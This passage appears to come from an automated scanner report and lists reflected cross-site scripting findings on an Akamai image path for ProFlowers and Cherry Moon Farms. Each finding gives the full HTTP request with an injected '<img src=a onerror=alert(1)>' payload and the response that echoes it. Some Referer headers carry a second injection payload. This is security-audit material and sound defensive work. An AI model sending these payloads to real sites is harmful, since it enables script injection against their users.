The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565 was submitted in the REST URL parameter 9. This input was echoed as 30a26<img src=a onerror=alert(1)>47859c8e565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img src=a onerror=alert(1)>47859c8e565

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b was submitted in the REST URL parameter 9. This input was echoed as 1a7b7<img src=a onerror=alert(1)>259093f2a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img src=a onerror=alert(1)>259093f2a2b

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225 was submitted in the REST URL parameter 9. This input was echoed as 3114b<img src=a onerror=alert(1)>5b9724d6225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img src=a onerror=alert(1)>5b9724d6225

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad was submitted in the REST URL parameter 9. This input was echoed as 3134b<img src=a onerror=alert(1)>0eff80005ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img src=a onerror=alert(1)>0eff80005ad

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload cb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065 was submitted in the REST URL parameter 9. This input was echoed as cb531<img src=a onerror=alert(1)>8866ce5e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img src=a onerror=alert(1)>8866ce5e065

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7 was submitted in the REST URL parameter 9. This input was echoed as ade22<img src=a onerror=alert(1)>04c4d155f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img src=a onerror=alert(1)>04c4d155f7

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081 was submitted in the REST URL parameter 9. This input was echoed as b8d1e<img src=a onerror=alert(1)>b9b63706081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img src=a onerror=alert(1)>b9b63706081

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4 was submitted in the REST URL parameter 9. This input was echoed as f576b<img src=a onerror=alert(1)>318adb917f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PFf576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurppetals11_PFf576b<img src=a onerror=alert(1)>318adb917f4

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263 was submitted in the REST URL parameter 9. This input was echoed as 14c82<img src=a onerror=alert(1)>a650ceee263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img src=a onerror=alert(1)>a650ceee263

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c was submitted in the REST URL parameter 9. This input was echoed as eb360<img src=a onerror=alert(1)>050e392a88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PFeb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringcarnspoms11_PFeb360<img src=a onerror=alert(1)>050e392a88c

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96 was submitted in the REST URL parameter 9. This input was echoed as f398f<img src=a onerror=alert(1)>7798ed45d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PFf398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringmix11_PFf398f<img src=a onerror=alert(1)>7798ed45d96

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173 was submitted in the REST URL parameter 9. This input was echoed as c3445<img src=a onerror=alert(1)>a12c7cc1173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PFc3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQsprngawake09_PFc3445<img src=a onerror=alert(1)>a12c7cc1173

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca was submitted in the REST URL parameter 9. This input was echoed as b01c9<img src=a onerror=alert(1)>1b6363653ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:42 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img src=a onerror=alert(1)>1b6363653ca

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3 was submitted in the REST URL parameter 9. This input was echoed as c1d42<img src=a onerror=alert(1)>8f4a450e5b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:14 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img src=a onerror=alert(1)>8f4a450e5b3

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload afe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2 was submitted in the REST URL parameter 9. This input was echoed as afe11<img src=a onerror=alert(1)>38946d8b0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:11 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img src=a onerror=alert(1)>38946d8b0c2

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36 was submitted in the REST URL parameter 9. This input was echoed as e5c08<img src=a onerror=alert(1)>f66d8f8ae36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_ACe5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

